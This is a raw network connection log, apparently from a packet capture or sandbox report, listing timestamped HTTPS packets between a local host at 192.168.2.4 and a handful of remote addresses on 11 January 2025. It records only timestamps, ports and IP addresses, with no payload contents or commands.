Jan 11, 2025 23:00:03.777585983 CET	49733	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:03.777585983 CET	49733	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:03.781464100 CET	49733	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:03.854060888 CET	49733	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:03.854104042 CET	443	49733	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:03.914110899 CET	49734	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:03.914216042 CET	443	49734	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:03.914298058 CET	49734	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:03.914565086 CET	49734	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:03.914594889 CET	443	49734	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:04.576258898 CET	443	49734	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:04.576453924 CET	49734	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:04.576833963 CET	49734	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:04.576863050 CET	443	49734	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:04.578479052 CET	49734	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:04.578491926 CET	443	49734	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:05.250822067 CET	443	49734	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:05.250888109 CET	443	49734	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:05.251007080 CET	49734	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:05.251075983 CET	443	49734	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:05.251112938 CET	443	49734	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:05.251138926 CET	49734	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:05.251168013 CET	49734	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:05.251352072 CET	49734	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:05.251385927 CET	443	49734	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:05.259501934 CET	49735	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:05.259582043 CET	443	49735	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:05.259679079 CET	49735	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:05.259896994 CET	49735	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:05.259933949 CET	443	49735	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:05.915132046 CET	443	49735	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:05.917711973 CET	49735	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:05.918133974 CET	49735	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:05.918165922 CET	443	49735	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:05.919960022 CET	49735	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:05.919974089 CET	443	49735	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:06.592339039 CET	443	49735	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:06.592453003 CET	49735	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:06.592516899 CET	443	49735	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:06.592554092 CET	443	49735	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:06.592578888 CET	49735	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:06.592614889 CET	49735	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:06.595355034 CET	49735	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:06.595386028 CET	443	49735	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:06.623337030 CET	49736	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:06.623361111 CET	443	49736	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:06.623410940 CET	49736	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:06.623671055 CET	49736	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:06.623682976 CET	443	49736	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:07.289105892 CET	443	49736	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:07.289174080 CET	49736	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:07.289868116 CET	49736	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:07.289872885 CET	443	49736	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:07.291958094 CET	49736	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:07.291961908 CET	443	49736	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:07.292017937 CET	49736	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:07.292026997 CET	443	49736	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:07.622737885 CET	49737	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:07.622795105 CET	443	49737	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:07.622905016 CET	49737	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:07.623260975 CET	49737	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:07.623270988 CET	443	49737	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:08.041789055 CET	443	49736	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:08.041964054 CET	443	49736	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:08.042342901 CET	49736	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:08.043057919 CET	49736	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:08.043071032 CET	443	49736	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:08.270432949 CET	443	49737	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:08.274044991 CET	49737	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:08.274044991 CET	49737	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:08.274063110 CET	443	49737	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:08.345606089 CET	49737	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:08.345616102 CET	443	49737	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:09.089714050 CET	443	49737	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:09.089767933 CET	49737	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:09.089778900 CET	443	49737	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:09.089813948 CET	49737	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:09.089838028 CET	443	49737	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:09.089871883 CET	49737	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:09.114325047 CET	49737	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:09.114347935 CET	443	49737	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:10.666762114 CET	49741	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:10.666821957 CET	443	49741	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:10.666910887 CET	49741	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:10.667290926 CET	49741	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:10.667310953 CET	443	49741	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:10.787547112 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:10.787607908 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:10.787667990 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:10.788059950 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:10.788078070 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:10.850374937 CET	49743	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:10.850433111 CET	443	49743	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:10.850517035 CET	49743	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:10.850940943 CET	49743	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:10.850958109 CET	443	49743	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:10.897792101 CET	49744	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:10.897855043 CET	443	49744	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:10.897926092 CET	49744	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:10.898139954 CET	49744	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:10.898156881 CET	443	49744	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.338727951 CET	443	49741	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.338951111 CET	49741	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.339015961 CET	443	49741	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.340502977 CET	443	49741	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.340569973 CET	49741	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.341586113 CET	49741	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.341676950 CET	443	49741	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.342020988 CET	49741	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.342039108 CET	443	49741	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.383923054 CET	49741	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.444746017 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.444952011 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.444968939 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.448506117 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.448581934 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.448877096 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.449038029 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.449054003 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.493277073 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.493288994 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.494323015 CET	443	49743	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.494663954 CET	49743	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.494687080 CET	443	49743	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.496177912 CET	443	49743	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.496241093 CET	49743	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.496512890 CET	49743	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.496602058 CET	443	49743	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.496608019 CET	49743	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.532583952 CET	443	49744	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.532886982 CET	49744	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.532918930 CET	443	49744	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.535649061 CET	443	49744	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.535718918 CET	49744	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.536011934 CET	49744	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.536097050 CET	443	49744	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.539334059 CET	443	49743	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.540158987 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.555790901 CET	49743	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.555826902 CET	443	49743	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.628247976 CET	443	49741	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.628330946 CET	443	49741	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.628381968 CET	443	49741	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.628405094 CET	49741	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.628443956 CET	443	49741	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.628501892 CET	49741	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.632392883 CET	443	49741	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.632555962 CET	443	49741	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.632608891 CET	49741	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.633157969 CET	49741	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.633188009 CET	443	49741	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.663093090 CET	49743	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.663180113 CET	49744	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.663213015 CET	443	49744	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.756913900 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.757045984 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.757138968 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.757221937 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.757227898 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.757297039 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.757339001 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.763833046 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.763889074 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.763905048 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.766820908 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.766877890 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.766891003 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.769861937 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.769917965 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.769929886 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.795030117 CET	443	49743	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.795398951 CET	443	49743	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.795465946 CET	49743	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.796878099 CET	49743	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.796921015 CET	443	49743	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.824316978 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.824387074 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.843081951 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.843256950 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.843322039 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.847101927 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.847310066 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.847326994 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.852257967 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.852319002 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.852332115 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.854643106 CET	49744	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.858583927 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.858649015 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.858661890 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.864873886 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.864948988 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.864962101 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.871150017 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.871217012 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.871227980 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.876754999 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.876838923 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.876853943 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.882447958 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.882606030 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.882618904 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.887974024 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.888041973 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.888053894 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.893587112 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.893661022 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.893672943 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.899298906 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.899410009 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.899430037 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.904792070 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.904851913 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.904865026 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.934266090 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.934305906 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.934330940 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.934346914 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.934427977 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.937891960 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.938045979 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.938096046 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.938107967 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.938191891 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.938282967 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.938294888 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.943605900 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.943667889 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.943680048 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.949134111 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.949198961 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.949209929 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.954705000 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.954761028 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.954772949 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.960545063 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.960609913 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.960623980 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.965833902 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.965900898 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.965914011 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.971298933 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.971369028 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.971383095 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.976624966 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.976681948 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.976694107 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.982877016 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.983088970 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.983103991 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.986936092 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.987014055 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.987027884 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.999550104 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.999636889 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.999720097 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.999741077 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:11.999759912 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:11.999787092 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.000209093 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.000264883 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.000276089 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.004826069 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.005474091 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.005490065 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.008281946 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.009476900 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.009491920 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.012240887 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.013464928 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.013479948 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.016238928 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.016272068 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.016335964 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.016350985 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.020159006 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.020164967 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.020180941 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.020251036 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.024044991 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.026499033 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.026525021 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.026555061 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.026568890 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.026729107 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.028842926 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.031029940 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.031054974 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.031085014 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.031099081 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.031150103 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.033374071 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.035742998 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.035803080 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.035815954 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.038089991 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.038142920 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.038153887 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.040462971 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.040522099 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.040533066 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.042774916 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.042855978 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.042926073 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.042937994 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.042990923 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.045152903 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.047297001 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.047419071 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.047430992 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.047687054 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:12.047768116 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.047844887 CET	49742	443	192.168.2.4	142.250.184.196
Jan 11, 2025 23:00:12.047877073 CET	443	49742	142.250.184.196	192.168.2.4
Jan 11, 2025 23:00:13.890650988 CET	49753	443	192.168.2.4	142.250.185.142
Jan 11, 2025 23:00:13.890674114 CET	443	49753	142.250.185.142	192.168.2.4
Jan 11, 2025 23:00:13.890739918 CET	49753	443	192.168.2.4	142.250.185.142
Jan 11, 2025 23:00:13.890973091 CET	49753	443	192.168.2.4	142.250.185.142
Jan 11, 2025 23:00:13.890995979 CET	443	49753	142.250.185.142	192.168.2.4
Jan 11, 2025 23:00:14.545747995 CET	443	49753	142.250.185.142	192.168.2.4
Jan 11, 2025 23:00:14.545957088 CET	49753	443	192.168.2.4	142.250.185.142
Jan 11, 2025 23:00:14.545963049 CET	443	49753	142.250.185.142	192.168.2.4
Jan 11, 2025 23:00:14.547570944 CET	443	49753	142.250.185.142	192.168.2.4
Jan 11, 2025 23:00:14.547795057 CET	49753	443	192.168.2.4	142.250.185.142
Jan 11, 2025 23:00:14.548782110 CET	49753	443	192.168.2.4	142.250.185.142
Jan 11, 2025 23:00:14.548881054 CET	443	49753	142.250.185.142	192.168.2.4
Jan 11, 2025 23:00:14.549056053 CET	49753	443	192.168.2.4	142.250.185.142
Jan 11, 2025 23:00:14.595325947 CET	443	49753	142.250.185.142	192.168.2.4
Jan 11, 2025 23:00:14.602792978 CET	49753	443	192.168.2.4	142.250.185.142
Jan 11, 2025 23:00:14.602798939 CET	443	49753	142.250.185.142	192.168.2.4
Jan 11, 2025 23:00:14.654025078 CET	49753	443	192.168.2.4	142.250.185.142
Jan 11, 2025 23:00:14.811752081 CET	443	49753	142.250.185.142	192.168.2.4
Jan 11, 2025 23:00:14.811841011 CET	443	49753	142.250.185.142	192.168.2.4
Jan 11, 2025 23:00:14.811875105 CET	443	49753	142.250.185.142	192.168.2.4
Jan 11, 2025 23:00:14.811927080 CET	443	49753	142.250.185.142	192.168.2.4
Jan 11, 2025 23:00:14.811949015 CET	49753	443	192.168.2.4	142.250.185.142
Jan 11, 2025 23:00:14.811955929 CET	443	49753	142.250.185.142	192.168.2.4
Jan 11, 2025 23:00:14.811968088 CET	443	49753	142.250.185.142	192.168.2.4
Jan 11, 2025 23:00:14.811989069 CET	49753	443	192.168.2.4	142.250.185.142
Jan 11, 2025 23:00:14.812196016 CET	49753	443	192.168.2.4	142.250.185.142
